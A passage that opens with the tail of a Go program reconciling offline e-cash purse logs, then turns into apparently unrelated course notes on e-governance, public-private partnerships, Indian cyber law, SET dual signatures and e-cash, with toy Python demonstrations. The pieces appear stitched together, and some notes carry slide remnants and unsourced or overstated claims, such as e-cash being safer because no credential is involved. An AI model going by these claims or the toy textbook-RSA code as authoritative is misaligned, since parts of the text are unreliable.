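func Reconcile(p *Purse, lastKnownBalance int) (gap int, lost int) {
	expected := lastKnownBalance
	for _, e := range p.log {
		expected += e.Amount
	}
	return p.Balance - expected, p.dropped
}

// Upload hands the log to the bank and clears the card's copy, returning the
// balance the bank should record for the next reconciliation.
func (p *Purse) Upload() int {
	p.log, p.dropped = nil, 0
	return p.Balance
}

func main() {
	// Constructed scenario: the bank last saw alice at 10.00 and bob at 0.00,
	// then fifteen offline transfers of 0.10 happen before either uploads.
	alice, bob := NewPurse("alice", 1000), NewPurse("bob", 0)
	lastKnown := map[string]int{"alice": 1000, "bob": 0}
	for i := 0; i < 15; i++ {
		if err := Transfer(alice, bob, 10); err != nil {
			fmt.Println(err)
		}
	}
	for _, p := range []*Purse{alice, bob} {
		gap, lost := Reconcile(p, lastKnown[p.ID])
		fmt.Printf("%s: balance=%d unexplained=%d lost_entries=%d\n", p.ID, p.Balance, gap, lost)
	}
}
```

Bob's purse ends up holding 50 cents more than its surviving log explains, which is exactly what a card that had minted value out of nothing would look like; alice's shows the mirror image. The only way to close the gap is for cards to upload before the ring overflows, which the offline design cannot enforce.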

E-GOVERNANCE

Although the term 'e-Governance' has gained currency in recent years, there is no standard definition of it. Different governments and organizations define the term to suit their own aims and objectives, and sometimes the term 'e-government' is used instead of 'e-Governance'.

Several dimensions and factors influence the definition of e-governance or electronic governance. The word "electronic" in the term implies technology-driven governance. E-governance is the application of information and communication technology (ICT) for delivering government services, exchange of information, communication transactions and integration of various stand-alone systems and services between government-to-citizen (G2C), government-to-business (G2B) and government-to-government (G2G), as well as the back office processes and interactions within the entire government framework. Through e-governance, government services are made available to citizens in a convenient, efficient and transparent manner. The three main target groups that can be distinguished in governance concepts are government, citizens and businesses/interest groups; in e-governance there are no distinct boundaries between them.

Generally four basic models are available: government-to-citizen (customer), government-to-employees, government-to-government and government-to-business.

Difference between E-Government and E-Governance

Both terms are often treated as the same; however, there is some difference between the two. E-government is the use of ICTs in public administration, combined with organizational change and new skills, to improve public services and democratic processes and to strengthen support to the public. The problem with taking this as a definition of e-governance is that it makes no provision for the governance of ICTs themselves. In fact the governance of ICTs most probably requires a substantial increase in regulation and policy-making capability, with all the expertise and opinion-shaping processes among the various social stakeholders that this implies. So the perspective of e-governance is the use of technologies that both help governing and have to be governed. Public-Private Partnership (PPP) based e-governance projects have been hugely successful in India; United Telecoms Limited, known as UTL, is a major player in India in PPP-based e-governance projects, each of which involved a mammoth state-wide area network.

E-governance is the future many countries look to for a corruption-free government. E-government is a one-way communication protocol, whereas e-governance is a two-way communication protocol. The essence of e-governance is to reach the beneficiary and ensure that the services intended for a given individual have actually reached them; there should be an automatic response channel through which the government learns the efficacy of its governance. E-governance is by the governed, for the governed and of the governed.

Establishing the identity of the end beneficiary is a challenge in all citizen-centric services, and statistical information published by governments and world bodies does not always reveal the facts. The best form of e-governance cuts down on unwanted interference from too many layers while delivering governmental services. It depends on a good infrastructural setup, with the support of local processes and parameters, for governments to reach their citizens or end beneficiaries. Budgets for planning, development and growth can be derived from well laid out e-governance systems.

Why e-Governance?

E-Government can transform citizen service, provide access to information to empower citizens, enable their participation in government and enhance citizens' economic and social opportunities, so that they can make better lives for themselves and for the next generation.

BASIC ARCHITECTURE


A suggested architecture for e-Governance is shown in the diagram: applications from various departments are integrated so that they can be accessed by any terminal or computer in any other department, or from anywhere through the network. This is possible because of the characteristics of CORBA: it is location transparent, language independent, implementation independent and operating system independent. The applications connected through CORBA/IIOP could be legacy applications wrapped to suit the CORBA specifications, new Web applications, or even a database environment using Oracle etc. Seamless interconnection, and thereby effective use of the entire e-Governance system, is possible if the middleware is designed to provide the necessary services such as transactions, database management, messaging and naming.

Regarding security, the CORBA Security standard is built around existing security specifications such as the Distributed Computing Environment (DCE), the Kerberos protocol and the Generic Security Service API (GSS-API). While those technologies are weighted heavily in the standard, public-key security with the Secure Sockets Layer (SSL) is what is popular for Internet-based transactions.

Types of Interactions in e-Governance

e-Governance facilitates interaction between the different stakeholders in governance. These interactions may be described as follows:

G2G (Government to Government)

In this case Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities. This kind of interaction is only within the sphere of government and can be both horizontal, i.e. between different government agencies as well as between different functional areas within an organization, and vertical, i.e. between national, provincial and local government agencies as well as between different levels within an organization. The primary objective is to increase efficiency, performance and output.


G2C (Government to Citizens)

In this case an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services. This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other. It gives citizens the choice of when to interact with the government (e.g. 24 hours a day, 7 days a week), from where to interact with the government (e.g. a service centre, an unattended kiosk, or from one's home or workplace) and how to interact with the government (e.g. through internet, fax, telephone, email, face-to-face etc.). The primary purpose is to make government citizen-friendly.

G2B (Government to Business)

Here e-Governance tools are used to help the business community, the providers of goods and services, to interact seamlessly with the government. The objective is to cut red tape, save time, reduce operational costs and create a more transparent business environment when dealing with the government. G2B initiatives can be transactional, such as licensing, permits, procurement and revenue collection, or promotional and facilitative, such as trade, tourism and investment. These measures provide a congenial environment that enables businesses to perform more efficiently.

G2E (Government to Employees)

Government is by far the biggest employer and, like any organization, it has to interact with its employees on a regular basis. This interaction is a two-way process between the organization and the employee. Use of ICT tools makes these interactions fast and efficient on the one hand and increases employee satisfaction on the other.

Difference between G2B and B2G

Government to business (G2B): the conducting of transactions between government bodies and businesses via the internet.

Business to government (B2G): professional affairs conducted between companies and regional, municipal or federal governing bodies. B2G typically encompasses the determination and evaluation of proposals and the completion of contracts.

PUBLIC PRIVATE PARTNERSHIPS

• Agreement between Government and the Private Sector for the Provision of a Public Good or Service by the Latter

• Generally, but not always, involving:

– Long Term Contracts

– User Charges and/or Payments flowing between the Parties

– Shared Investments, but Mainly Private

– Risk Sharing by the Parties

• Must be a Partnership

A public-private partnership exists when public sector agencies (federal, state or local) join with private sector entities (companies, foundations, academic institutions or citizens) and enter into a business relationship to attain a commonly shared goal that also achieves the objectives of the individual partners.

Why do them?

• Fiscal Head Room

• As a Way of Financing the Project

• Separate Policy & Regulation from Operations

• Make the Good or Service Available

• Pay for Performance and Output

• Introduce Competition: For and In the Market


The Need to Set the Right Priorities

Four Basic Dimensions of P3

Although each is unique, all P3s include four basic characteristics:

Shared goals

Shared resources (time money expertise people)

Shared risks

Shared benefits

Benefits

Expedited project completion

Project cost savings

Improved quality

Use of private resources

Access to new sources of private capital

Two Major Steps


Crafting the Partnership

Implementing the Partnership

Project Management

Six Distinct Phases

Genesis

What's the need?

What's driving the need (rationale)? Facility non-compliance, natural disaster, budget deficit

Is there a need for a Public/Private Partnership?


Preliminary Project Definition

Feasibility

Is a Public/Private Partnership feasible, not only financially but practically? Can it be done?

Market Research

Economic/Financial Analysis

Program, Budget and Schedule

Risk Analysis

Plan and Test

Final project definition

What is the best way to complete the project?

Has the plan been thoroughly tested to assess market demand, public and stakeholder feedback, and economics?

Master Schedule/Budget

Political Climate

Any potential "fatal flaws" that could derail the project?

Procurement and Contracting

How do you choose and contract with the best-value private partner?

What's the best delivery method?

Design-Bid-Build

Design-Build

Finance-Design-Build

What do current statutes allow?

Procurement Approach

Sole Source, RFP, Low Bid

Risk Allocation between Public and private Partners

Structuring of Contract: Risks and Rewards


Implement

Environmental

Design

Permitting

Construction

Commissioning and Administration

Operate

Startup

Monitoring

Assessment

Enhancement

Contract Modifications

Contract Renegotiations

READINESS IN E-GOVERNANCE

A high level of readiness to develop and implement e-government services is a prerequisite for a high-performing and innovative public sector that delivers integrated services, making life easier for citizens and businesses. E-government readiness is therefore a significant indicator of whether a country is prepared to harvest the efficiencies gained from ICT-enabled public administration.

The UN's e-government readiness index is a combined indicator of the supply of, potential demand for, and maturity of e-government services. OECD member countries exhibit a high capacity to develop and implement e-government services. This is generally characterized by an extensive broadband infrastructure; a repository of electronic information on government laws and policies, including links to archived information and downloadable forms; and a high level of comfort with ICT among citizens and businesses. Countries with the highest readiness index also tend to have a large number of transactional and e-commerce features on their government websites. As noted by the UN in its 2008 e-government survey, the Scandinavian countries with the top three scores on the readiness index all share broadly similar e-government environments (e.g. the accessibility and penetration of the electronic infrastructure) and strategies (e.g. the online provision of services). Each country has two main government websites: one that is informative and another that is a gateway for e-government services. In addition, citizens and businesses are able to access many services and complete many transactions online. However, similar levels of e-government readiness can also result from different strategic approaches.

Internet access is a prerequisite for citizens and businesses to use e-government services, and thus a leading indicator of countries' readiness to harness the potential efficiencies of ICT. Broadband penetration has increased dramatically in most OECD member countries in the past five years, as countries have made significant investments in their telecommunications infrastructure.

SECURITY ISSUES IN E-GOVERNANCE

1 INTRODUCTION

The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions. In particular, the networking potential offered by the Internet and related technologies has the potential to transform the structures and operation of government.

The effective management of information security is a key factor, as the willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have in the data security of the service.

2 INFORMATION SECURITY

A central challenge of e-Government services is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens.

The process approach for an information security management system (ISMS) encourages its users to emphasize the importance of:

understanding an organization's information security requirements and the need to establish policy and objectives for information security;

implementing and operating controls to manage an organization's information security risks in the context of the organization's overall business risks;

monitoring and reviewing the performance and effectiveness of the ISMS;

continual improvement based on objective measurement.

Data security requires a set of security requirements:

Authentication: capability to identify who is using the services (person or software program); the process of verifying that you are who you say you are.

Authorization: capability to grant access rights to resources; the process of verifying that someone has the right to do what she is trying to do.

Confidentiality: capability to prevent unauthorized access to information.

Integrity: capability to prevent unauthorized modification of information, ensuring that information can be relied upon and is accurate and complete.

Traceability: capability to chronologically relate any transaction to the person or system that performed the action, in a way that is verifiable.

Non-repudiation: capability to prevent a person or system that took part in an event or action from denying or challenging their participation in the event.

Examples of organizational and technical measures to prevent unauthorized access and processing:

Protecting premises, equipment and systems software, including input-output units

Protecting software applications used to process personal data

Preventing unauthorized access to personal data during transmission thereof, including transmission via telecommunication means and networks

Ensuring effective methods of blocking, destruction, erasure or anonymization of personal data

Enabling subsequent determination of when individual personal data were entered into a filing system, used or otherwise processed, and of the person responsible, for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data

Although trusted security and privacy measures constitute a crucial success factor for e-Government, this has not yet been addressed: as the UN 2012 Survey shows, only 20% of national portals clearly indicate the presence of security features. Europe is leading, with 44% of countries displaying secure links on their national websites, but the survey does not consider regional and local websites, nor the many decentralized public organization web portals.

3 INFORMATION SECURITY THREATS

Services provided by e-Government to citizens, enterprises, public officers, government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats. Detailed examples exist of cyber attacks using techniques like packet sniffers, probes, malware, internet infrastructure attacks, denial of service attacks, remote-to-local attacks and user-to-root attacks. The successful adoption of an ISMS is important to protect information assets, allowing an organization to:

Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis

Maintain a structured and comprehensive framework for identifying and assessing information security risks, selecting and applying applicable controls, and measuring and improving their effectiveness

Continually improve its control environment

Effectively achieve legal and regulatory compliance

There are simple and well-known web application vulnerabilities that could be avoided, but e-Government websites are still vulnerable. A research work found 816 e-Government web sites from 212 different countries to be vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection. An SQL injection attack can compromise data integrity, while XSS is a vulnerability which attackers may exploit to steal users' information.

Specific security measures like firewalls, intrusion detection software, encryption and secure networks must be defined, designed and implemented for government agencies to provide the appropriate levels of security. But information security must also take into consideration the people and processes that rely on the systems. Employees with daily access to e-Government systems must be trained on cybersecurity, and this aspect must become part of their job. A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies, and how that work could be used to train government employees to improve the security posture of government departments and agencies.


CYBER CRIME AND LAWS

The expression 'Crime' is defined as an act which subjects the doer to legal punishment, or any offence against morality, social order or any unjust or shameful act. The "Offence" is defined in the Code of Criminal Procedure to mean an act or omission made punishable by any law for the time being in force.

Cyber Crime is emerging as a serious threat. Worldwide, governments, police departments and intelligence units have started to react.

Cyber Crime is a term used to broadly describe criminal activity in which computers or computer networks are a tool, a target or a place of criminal activity, and includes everything from electronic cracking to denial of service attacks. It is also used to include traditional crimes in which computers or networks are used to enable the illicit activity.

Computer crime mainly consists of unauthorized access to computer systems, data alteration, data destruction and theft of intellectual property. Cyber crime in the context of national security may involve hacking, traditional espionage or information warfare and related activities.

Pornography, Threatening Email, Assuming someone's Identity, Sexual Harassment, Defamation, Spam and Phishing are some examples where computers are used to commit crime, whereas Viruses, Worms and Industrial Espionage, Software Piracy and Hacking are examples where computers become the target of crime.

Cyber Crime Variants

Hacking

Hacking is a crime which entails cracking systems and gaining unauthorized access to the data stored in them. Hacking had witnessed a 37 per cent increase this year.

Cyber Squatting

Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune. This is an issue that has not been tackled in the IT ACT 2000.

Phishing is just one of the many frauds on the Internet trying to fool people into parting with their money. Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions, requesting them to enter their Username, Password or other personal information to access their Account for some reason.

The fraudster then has access to the customer's online bank account and to the funds contained in that account.

Cyber Stalking is the use of the Internet or other electronic means to stalk someone. This term is used interchangeably with online harassment and online abuse. Stalking generally involves harassing or threatening behaviour that an individual engages in repeatedly, such as following a person, appearing at a person's home or place of business, making harassing phone calls, leaving written messages or objects, or vandalizing a person's property.


Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access to private personal and financial information from the public for the purpose of financial reward. The term is a combination of "Voice" and "phishing". Vishing exploits the public's trust in landline telephone services.

Vishing is typically used to steal credit card numbers or other information used in identity theft schemes from individuals.

A rapidly growing online user base

121 Million Internet Users

65 Million Active Internet Users, up by 28% from 51 million in 2010

50 Million users shop online on E-commerce and Online Shopping Sites

46+ Million Social Network Users

346 million mobile users had subscribed to Data Packages


CYBER LAW

(1) Whoever, with the Intent to cause or knowing that he is likely to cause Wrongful Loss or Damage to the public or any person, Destroys or Deletes or Alters any Information Residing in a Computer Resource, or diminishes its value or utility, or affects it injuriously by any means, commits hacking.

(2) Whoever commits hacking shall be punished with imprisonment up to three years, or with fine which may extend up to two lakh rupees, or with both.

Whoever, without permission of the owner of the computer:

Secures Access

Downloads, Copies or extracts any data, computer database or any information

Introduces or causes to be introduced any Virus or Contaminant

Disrupts or causes disruption

Denies or causes denial of access to any person

Provides any assistance to any person to facilitate access

Charges the services availed of by a person to the account of another person by Tampering with or Manipulating any Computer, Computer System or Computer Network

shall be liable to pay damages by way of compensation not exceeding one crore rupees to the person so affected.

Section – 43

Destroys, Deletes or Alters any Information residing in a computer resource, or diminishes its value or utility, or affects it injuriously by any means

Steals, conceals, destroys or alters, or causes any person to steal, conceal, destroy or alter, any computer source code used for a computer resource with an intention to cause damage

"If any person, dishonestly or fraudulently, does any act referred to in section 43, he shall be punishable with imprisonment for a term which may extend to three years, or with fine which may extend to five lakh rupees, or with both." [S66]

S66A - Punishment for sending offensive messages through communication service, etc.

Any person who sends, by means of a computer resource or a communication device:

Any information that is grossly offensive or has menacing character; or

Any information which he knows to be false, but for the purpose of causing annoyance, inconvenience, danger, obstruction, insult, injury, criminal intimidation, enmity, hatred or ill will, persistently makes by making use of such computer resource or a communication device; or

Any electronic mail or electronic mail message for the purpose of causing annoyance or inconvenience, or to deceive or to mislead the addressee or recipient about the origin of such messages,

shall be punishable with imprisonment for a term which may extend to three years and with fine.

S 66C - Punishment for identity theft

"Whoever fraudulently or dishonestly makes use of the electronic signature, password or any other unique identification feature of any other person shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to rupees one lakh."

S 66D - Punishment for cheating by personation by using computer resource

"Whoever, by means of any communication device or computer resource, cheats by personation shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to one lakh rupees."

S 66E - Punishment for violation of privacy

"Whoever intentionally or knowingly captures, publishes or transmits the image of a private area of any person without his or her consent, under circumstances violating the privacy of that person, shall be punished with imprisonment which may extend to three years or with fine not exceeding two lakh rupees, or with both."

S 67 A - Punishment for publishing or transmitting of material containing sexually explicit act, etc. in electronic form

"Whoever publishes or transmits or causes to be published or transmitted in the electronic form any material which contains sexually explicit act or conduct shall be punished on first conviction with imprisonment of either description for a term which may extend to five years and with fine which may extend to ten lakh rupees."

S 67 C - Preservation and Retention of information by intermediaries

"(1) Intermediary shall preserve and retain such information as may be specified for such duration and in such manner and format as the Central Government may prescribe.

(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub-section (1) shall be punished with an imprisonment for a term which may extend to three years and shall also be liable to fine."


IT ACT

The Information Technology Act, 2000 (also known as ITA-2000, or the IT Act) is an Act of the Indian Parliament (No. 21 of 2000) notified on October 17, 2000. This act is being opposed by the Save Your Voice campaign and other civil society organizations in India. The user-review and consumer social networking site MouthShut.com has filed a writ petition in the Supreme Court of India to repeal and nullify parts of the IT Act 2000.

The United Nations General Assembly, by resolution A/RES/51/162 dated 30 January 1997, adopted the Model Law on Electronic Commerce adopted by the United Nations Commission on International Trade Law. This is referred to as the UNCITRAL Model Law on E-Commerce. Following the UN Resolution, India passed the Information Technology Act 2000 in May 2000, which came into force on October 17, 2000. The Information Technology Act 2000 has been substantially amended through the Information Technology (Amendment) Act 2008, which was passed by the two houses of the Indian Parliament on December 23 and 24, 2008. It got Presidential assent on February 5, 2009 and came into force on October 27, 2009. The amended Act has provided additional focus on information security. It has added several new sections on offences, including cyber terrorism and data protection. A set of Rules related to sensitive personal information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was notified in April 2011.

Provisions –

The Information Technology Act 2000 consisted of 94 sections segregated into 13 chapters. Four schedules form part of the Act. In the 2008 version of the Act there are 124 sections (excluding 5 sections that have been omitted from the earlier version) and 14 chapters. Schedules I and II have been replaced; Schedules III and IV are deleted.

Information Technology Act 2000 addressed the following issues

1 Legal recognition of electronic documents

2 Legal Recognition of digital signatures

3 Offenses and contraventions

4 Justice dispensation systems for cybercrimes

Offences –

Section | Offence | Punishment

65 | Tampering with computer source documents - Intentional concealment, destruction or alteration of source code when the computer source code is required to be kept or maintained by law for the time being in force | Imprisonment up to three years, or/and with fine up to 2 lakh rupees

66 | Hacking | Imprisonment up to three years, or/and with fine up to 5 lakh rupees

66-A | Sending offensive message through electronic means - Sending any information through an electronic message that is grossly offensive or has menacing character and might cause insult, injury, criminal intimidation, enmity, hatred or ill will etc., or sending such mail intended to deceive or to mislead the addressee or recipient about the origin of such messages | Imprisonment up to three years and with fine

Criticisms –

The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December 2008 with no discussion in the House. Some of the cyber law observers have criticized the amendments on the ground of lack of legal and procedural safeguards to prevent violation of the civil liberties of Indians. There has also been appreciation of the amendments from many observers, because it addresses the issue of Cyber Security.

Section 69 empowers the Central Government/State Government, or its authorized agency, to intercept, monitor or decrypt any information generated, transmitted, received or stored in any computer resource if it is necessary or expedient so to do in the interest of the sovereignty or integrity of India, defence of India, security of the State, friendly relations with foreign States or public order, or for preventing incitement to the commission of any cognizable offence, or for investigation of any offence. They can also secure assistance from computer personnel in decrypting data (see mandatory decryption), under penalty of imprisonment.

Section 66A is widely criticized. It has led to numerous abuses reported by the press. Section 66A has also been criticised and challenged in the Lucknow and Madras High Courts for its constitutional validity. Based on Section 66A, the Bombay High Court has held that creating a website and storing false information on it can entail cyber crime.


• SET aims at satisfying the following security requirements in the context of credit card payment:

– Confidentiality - Sensitive messages are encrypted so that they are kept confidential

– Integrity - Nearly all messages are digitally signed to ensure content integrity

– Authentication - Authentication is performed through a public key infrastructure

SET network architecture

Merchant: a seller which is connected to an acquirer

Cardholder: a registered holder of the credit card who is a buyer

Issuer: the bank that issues the credit card to a cardholder

Acquirer: the bank that serves as an "agent" to link a merchant to multiple issuers

• A merchant can process various credit cards through a single acquirer

• Payment Gateway: This is typically connected to the acquirer

– The payment gateway is situated between the SET system and the financial network of the current credit card system for processing the credit card payment

SET Digital Certificate System


Dual signature generation and verification –

• In the physical credit card system:

– the Payment Instructions (PI), including the cardholder's credit card number and signature, are not kept confidential

– data integrity can basically be ensured by using printed receipts

– cardholder's authentication relies on simple signature checking only

• In an electronic credit card system:

– the Order Information (OI) and PI can be digitally signed to ensure data integrity

– the sensitive credit card information may still be disclosed to other people

• SET introduces a novel method called the dual signature (DS) to ensure data integrity while protecting the sensitive information


How the merchant and the payment gateway can verify the DS

• The merchant is provided with OI, H[PI] and DS.

• The dual signature can be verified as follows:

Step 1: The merchant first finds H[ H[PI] || H[OI] ].

Step 2: He then decrypts the digital signature with the cardholder's public signature key as follows: D_RSA[ DS | key_public_sign,cardholder ], where key_public_sign,cardholder is the public signature key of the cardholder.

Step 3: Finally, he compares the two terms H[ H[PI] || H[OI] ] and D_RSA[ DS | key_public_sign,cardholder ]. They should be the same if the transmitted DS has not been changed; otherwise the order is not valid.

The payment gateway is provided with PI, H[OI] and DS.

By using the dual signature method, each cardholder can link OI and PI while releasing only the necessary information to the relevant party.

If either the OI or PI is changed, the dual signature will no longer be valid.
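The verification steps above, as an added example that is not part of the original notes: a toy Python implementation of the dual signature with both the merchant's check (OI, H[PI], DS) and the payment gateway's check (PI, H[OI], DS). It assumes a constructed cardholder RSA key built from two Mersenne primes (reproducible, demo only, not a secure key), SHA-256 as H, textbook RSA without padding, and the constructed OI and PI strings shown; the last two checks show that altering either OI or PI after signing invalidates DS.

```python
import hashlib

# Constructed cardholder signature key pair: two Mersenne primes, so the
# key is reproducible and needs no library. Demo only; not a secure key.
_P = 2**521 - 1
_Q = 2**607 - 1
N = _P * _Q                           # modulus, ~1128 bits, larger than a SHA-256 digest
E = 65537                             # key_public_sign,cardholder
D = pow(E, -1, (_P - 1) * (_Q - 1))   # cardholder's private signature exponent


def H(data: bytes) -> bytes:
    """The hash H[...] of the notes; SHA-256 here."""
    return hashlib.sha256(data).digest()


def dual_digest(h_pi: bytes, h_oi: bytes) -> bytes:
    """H[ H[PI] || H[OI] ]: the single value the cardholder signs."""
    return H(h_pi + h_oi)


def make_dual_signature(pi: bytes, oi: bytes) -> int:
    """Cardholder side: DS = RSA signature of H[H[PI] || H[OI]] (textbook RSA)."""
    m = int.from_bytes(dual_digest(H(pi), H(oi)), "big")
    return pow(m, D, N)


def recover_digest(ds: int) -> bytes:
    """D_RSA[DS | key_public_sign,cardholder]: apply the public key to DS."""
    v = pow(ds, E, N)
    if v >= 1 << 256:        # cannot be a SHA-256 digest: DS itself was altered
        return b""
    return v.to_bytes(32, "big")


def merchant_verifies(oi: bytes, h_pi: bytes, ds: int) -> bool:
    """Merchant holds OI, H[PI] and DS; it never sees the card details in PI."""
    return recover_digest(ds) == dual_digest(h_pi, H(oi))


def gateway_verifies(pi: bytes, h_oi: bytes, ds: int) -> bool:
    """Payment gateway holds PI, H[OI] and DS; it never sees what was ordered."""
    return recover_digest(ds) == dual_digest(H(pi), h_oi)


# Constructed order information and payment instructions.
OI = b"order=1 x textbook; ship-to=12 Example Street"
PI = b"card=4111111111111111; exp=12/30; amount=25.00"   # constructed test PAN


def demo() -> dict:
    """Cardholder signs once; merchant and gateway each check their own half."""
    ds = make_dual_signature(PI, OI)
    altered_oi = b"order=10 x textbook; ship-to=12 Example Street"
    altered_pi = b"card=4111111111111111; exp=12/30; amount=2500.00"
    return {
        "merchant_ok": merchant_verifies(OI, H(PI), ds),
        "gateway_ok": gateway_verifies(PI, H(OI), ds),
        # an OI changed after signing no longer matches DS at the gateway
        "altered_oi_rejected": not gateway_verifies(PI, H(altered_oi), ds),
        # a PI changed after signing no longer matches DS at the merchant
        "altered_pi_rejected": not merchant_verifies(OI, H(altered_pi), ds),
    }


if __name__ == "__main__":
    print(demo())
```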

DIGITAL ENVELOPE ndash


SET PROTOCOL –

The SET protocol has four phases: initiation, purchase, authorization and capture.

First, the cardholder sends a purchase initiation request to the merchant for initializing the payment. Then the merchant returns a response message to the cardholder.

In the second phase, the cardholder sends the purchase order together with the payment instruction to the merchant.

In the third phase, the merchant obtains the authorization from the issuer via the payment gateway.

Finally, the merchant requests a money transfer to its account.

E-CASH

Electronic money is paperless cash. This money is either stored on a card itself or in an account associated with the card.

The most common examples are transit cards, meal plans and PayPal. E-Cash can also mean any kind of electronic payment.

Electronic payment systems come in many forms, including virtual cheques, ATM cards, credit cards and stored value cards. The usual security features for such systems are privacy, authenticity and non-repudiation.

There are four major components in an electronic cash system:

Issuers

Customers

Merchants or traders

Regulators

Issuers can be banks or non-bank institutions; customers are the users who spend E-Cash; merchants and traders are vendors who receive E-Cash; regulators are related authorities or state tax agencies.

For an E-Cash transaction to occur, we need to go through at least three stages:

Account Setup: Customers will need to obtain E-Cash accounts through certain issuers. Merchants who would like to accept E-Cash will also need to arrange accounts with various E-Cash issuers. Issuers typically handle accounting for customers and merchants.

Purchase: Customers purchase certain goods or services and give the merchants tokens which represent equivalent E-Cash. Purchase information is usually encrypted when transmitted over the network.

Authentication: Merchants will need to contact E-Cash issuers about the purchase and the amount of E-Cash involved. E-Cash issuers will then authenticate the transaction and approve the amount of E-Cash involved.

E-cash payment system –

For accessing services online, e-cash is a prime method for secure online payments. The following model shows how the e-cash payment system works.


This is a simple model of the E-cash payment system. It gives us the idea of how the e-cash payment system works. The model is explained properly in the upcoming slides.

The customer approaches his issuer's (bank's) site for accessing his account. The issuer in return issues the money in the form of tokens, which are generally in denominations of tens and hundreds, or as specified by the customer.

In the second phase, the customer endorses those tokens to the merchant for acquiring services, for which the customer authenticates the payment to the trader.

In the third phase, the trader approaches the token issuer (the customer's bank) and, after authenticating the tokens, the issuing bank converts the tokens into electronic funds and transfers the same into the trader's account.

Finally, after getting the payment for the respective services, the trader provides the requisite service or product and also notifies the customer about the approval of the payment made by the customer into the trader's account.

A system that allows a person to pay for goods or services by transmitting a number from one computer to another.

Like the serial numbers on real currency notes, the E-cash numbers are unique.

This is issued by a bank and represents a specified sum of real money.


It is anonymous and reusable

Electronic Cash Security

Complex cryptographic algorithms prevent double spending

Anonymity is preserved unless double spending is attempted

Serial numbers can allow tracing to prevent money laundering
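The three-stage flow (account setup, purchase, authentication) and the double-spending check described above, as an added example that is not the notes' own code: a minimal Python issuer that mints serial-numbered tokens in the requested denominations, authenticates them when the merchant presents them, and refuses any serial it has already paid out. The issuer secret, account names and balances are constructed; tokens are authenticated with an HMAC rather than a signature because in this model only the issuer ever verifies them, and the blind-signature anonymity the notes mention is not implemented.

```python
import hashlib
import hmac
import secrets
from dataclasses import dataclass
from typing import Dict, List, Set


@dataclass(frozen=True)
class Token:
    """One unit of E-Cash, like a banknote with a serial number."""
    serial: str   # unique serial assigned by the issuer
    value: int    # constructed: whole currency units
    tag: str      # issuer authentication tag (hex HMAC-SHA256 over serial:value)


class Issuer:
    """Issues tokens on withdrawal and authenticates them on deposit."""

    def __init__(self, key: bytes) -> None:
        self._key = key                       # issuer-only secret (constructed)
        self.accounts: Dict[str, int] = {}    # constructed: account name -> balance
        self._spent: Set[str] = set()         # serials already redeemed

    def open_account(self, name: str, balance: int) -> None:
        """Stage 1, account setup: customers and merchants both need an account."""
        self.accounts[name] = balance

    def _tag(self, serial: str, value: int) -> str:
        msg = f"{serial}:{value}".encode()
        return hmac.new(self._key, msg, hashlib.sha256).hexdigest()

    def withdraw(self, customer: str, denominations: List[int]) -> List[Token]:
        """Issue tokens in the requested denominations and debit the customer."""
        total = sum(denominations)
        if self.accounts.get(customer, 0) < total:
            raise ValueError("insufficient funds")
        self.accounts[customer] -= total
        tokens = []
        for value in denominations:
            serial = secrets.token_hex(8)     # 64-bit random serial, unique in practice
            tokens.append(Token(serial, value, self._tag(serial, value)))
        return tokens

    def redeem(self, merchant: str, token: Token) -> bool:
        """Stage 3, authentication: verify the token, block double spending, credit the merchant."""
        if not hmac.compare_digest(token.tag, self._tag(token.serial, token.value)):
            return False                      # forged or altered token
        if token.serial in self._spent:
            return False                      # this serial was already paid out
        self._spent.add(token.serial)
        self.accounts[merchant] = self.accounts.get(merchant, 0) + token.value
        return True


def demo() -> dict:
    """Walk through the three stages with constructed parties and amounts."""
    bank = Issuer(secrets.token_bytes(32))
    bank.open_account("alice", 300)
    bank.open_account("shop", 0)
    tokens = bank.withdraw("alice", [100, 10, 10])       # stage 2: alice hands these to the shop
    accepted = [bank.redeem("shop", t) for t in tokens]  # the shop deposits each token
    replayed = bank.redeem("shop", tokens[0])            # same token presented a second time
    altered = Token(tokens[1].serial, 1000, tokens[1].tag)  # value changed, tag no longer matches
    return {
        "issued": len(tokens),
        "all_accepted": all(accepted),
        "replay_rejected": not replayed,
        "altered_rejected": not bank.redeem("shop", altered),
        "alice_balance": bank.accounts["alice"],
        "shop_balance": bank.accounts["shop"],
    }


if __name__ == "__main__":
    print(demo())
```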

E-Cash Processing

E-cash security

Security is of extreme importance while handling online transactions. Faith in the security of the medium of exchange, whether paper or digital, is essential for the economy to function.

E-cash is more secure than other online payment modes because in this case no credential such as a card password or anything similar is involved. It is simply an online fund transfer from the customer's account to the trader's account.


However, while accessing the customer's account, the customer must keep in mind internet security sweeps or theft. Online hacking and cracking can be avoided by using SSL and TLS website security systems, keeping the website link on safe "https" protocols, and using proper internet security software to keep aside the threats of malware, eavesdropping and other security threats.

Advantages

We can transfer funds, purchase stocks and offer a variety of other services without having to handle physical cash or cheques.

Electronic cash protects its user against theft. With electronic cash the customer does not need to provide financial information.

E-cash supports small payments. Other online payment systems charge a fee for every transaction, no matter how high or low it is, but e-cash has a specific limit for additional charges; that's why very low payments are not charged a fee.

Limitations

However secure the e-cash payment system may be, still no one is safe against online frauds. In this case the trader is referred to as fraudulent: the trader may take the amount but may not provide the services.

